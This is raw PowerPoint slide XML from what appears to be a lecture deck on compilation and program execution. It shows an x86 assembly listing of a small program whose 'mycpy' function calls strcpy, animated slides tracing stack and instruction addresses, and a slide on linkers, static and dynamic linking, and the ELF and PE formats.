          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>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  leave</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>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  ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  push </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ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </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esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,</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ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sub $0x10,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0x8048504,(</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esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mycpy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0x8048517,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </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eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0x0,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  leave</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="607570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
                                            <p:txEl>
                                              <p:pRg st="14" end="14"/>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6">
                                            <p:txEl>
                                              <p:pRg st="15" end="15"/>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6">
                                            <p:txEl>
                                              <p:pRg st="16" end="16"/>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6">
                                            <p:txEl>
                                              <p:pRg st="17" end="17"/>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6">
                                            <p:txEl>
                                              <p:pRg st="18" end="18"/>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6">
                                            <p:txEl>
                                              <p:pRg st="19" end="19"/>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6">
                                            <p:txEl>
                                              <p:pRg st="20" end="20"/>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6">
                                            <p:txEl>
                                              <p:pRg st="21" end="21"/>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6">
                                            <p:txEl>
                                              <p:pRg st="22" end="22"/>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nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="1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nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="1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nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="1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nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="142"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ntr" presetSubtype="0" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="14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127</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="77571" y="261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0xfd2d4</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0xfd2e0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0x804840e</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8" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4530468" y="357945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ectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1999962" y="5312720"/>
            <a:ext cx="165295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999962" y="6055602"/>
            <a:ext cx="165295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1999962" y="5633796"/>
            <a:ext cx="165295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7583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xEl>
                                              <p:pRg st="16" end="1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xEl>
                                              <p:pRg st="17" end="17"/>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7">
                                            <p:txEl>
                                              <p:pRg st="18" end="18"/>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7">
                                            <p:txEl>
                                              <p:pRg st="19" end="19"/>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7">
                                            <p:txEl>
                                              <p:pRg st="20" end="20"/>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7">
                                            <p:txEl>
                                              <p:pRg st="21" end="21"/>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7">
                                            <p:txEl>
                                              <p:pRg st="22" end="22"/>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7">
                                            <p:txEl>
                                              <p:pRg st="24" end="24"/>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7">
                                            <p:txEl>
                                              <p:pRg st="25" end="25"/>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7">
                                            <p:txEl>
                                              <p:pRg st="26" end="26"/>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7">
                                            <p:txEl>
                                              <p:pRg st="27" end="27"/>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7">
                                            <p:txEl>
                                              <p:pRg st="28" end="28"/>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7">
                                            <p:txEl>
                                              <p:pRg st="29" end="29"/>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7">
                                            <p:txEl>
                                              <p:pRg st="30" end="30"/>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7">
                                            <p:txEl>
                                              <p:pRg st="31" end="31"/>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7">
                                            <p:txEl>
                                              <p:pRg st="32" end="32"/>
                                            </p:txEl>
                                          </p:spTgt>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7">
                                            <p:txEl>
                                              <p:pRg st="33" end="33"/>
                                            </p:txEl>
                                          </p:spTgt>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7">
                                            <p:txEl>
                                              <p:pRg st="35" end="35"/>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7">
                                            <p:txEl>
                                              <p:pRg st="36" end="36"/>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7">
                                            <p:txEl>
                                              <p:pRg st="37" end="37"/>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7">
                                            <p:txEl>
                                              <p:pRg st="38" end="38"/>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7">
                                            <p:txEl>
                                              <p:pRg st="39" end="39"/>
                                            </p:txEl>
                                          </p:spTgt>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17">
                                            <p:txEl>
                                              <p:pRg st="40" end="40"/>
                                            </p:txEl>
                                          </p:spTgt>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7">
                                            <p:txEl>
                                              <p:pRg st="41" end="41"/>
                                            </p:txEl>
                                          </p:spTgt>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7">
                                            <p:txEl>
                                              <p:pRg st="42" end="42"/>
                                            </p:txEl>
                                          </p:spTgt>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17">
                                            <p:txEl>
                                              <p:pRg st="43" end="43"/>
                                            </p:txEl>
                                          </p:spTgt>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17">
                                            <p:txEl>
                                              <p:pRg st="44" end="44"/>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17">
                                            <p:txEl>
                                              <p:pRg st="45" end="45"/>
                                            </p:txEl>
                                          </p:spTgt>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5"/>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7"/>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8"/>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grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="104" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="9"/>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xit" presetSubtype="0" fill="hold" grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="108" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>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6"/>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5"/>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1" presetClass="exit" presetSubtype="0" fill="hold" grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="120" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="14"/>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18" grpId="0" animBg="1"/>
      <p:bldP spid="12" grpId="0" animBg="1"/>
      <p:bldP spid="14" grpId="0" animBg="1"/>
      <p:bldP spid="15" grpId="0" animBg="1"/>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128</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="61763" y="62954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0xfd2e0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0x804840e</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8" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4530468" y="357945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83919676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129</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="61763" y="62954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0xfd2e0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0x804840f</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8" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4530468" y="389995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854885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Compilation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The linker combines the binary object with libraries, resolving references that the code has to external objects (e.g., functions) and creates the final executable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GNU/Linux: The linker is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ld</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Static linking is performed at compile-time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dynamic linking is performed at run-time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most common executable formats:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GNU/Linux: ELF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows: PE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1974179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130</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="61763" y="62954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0x804840f</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8" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4530468" y="389995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4708334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131</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="61763" y="62954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0x8048414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8" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4530468" y="415448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05579731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132</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="79016" y="21132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0x8048414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8" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4530468" y="415448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TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2788099" y="1948036"/>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0xfd2c0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12816527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133</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="79016" y="21132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0x8048417</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8" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4530468" y="443053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TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2788099" y="1948036"/>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14762856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r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504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134</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="79016" y="21132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0x8048417</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8" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4530468" y="443053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TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2788099" y="1948036"/>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84964605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r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504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135</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="79016" y="21132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0x804841e</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8" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4530468" y="471520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TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2788099" y="1948036"/>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138249428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r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504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136</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
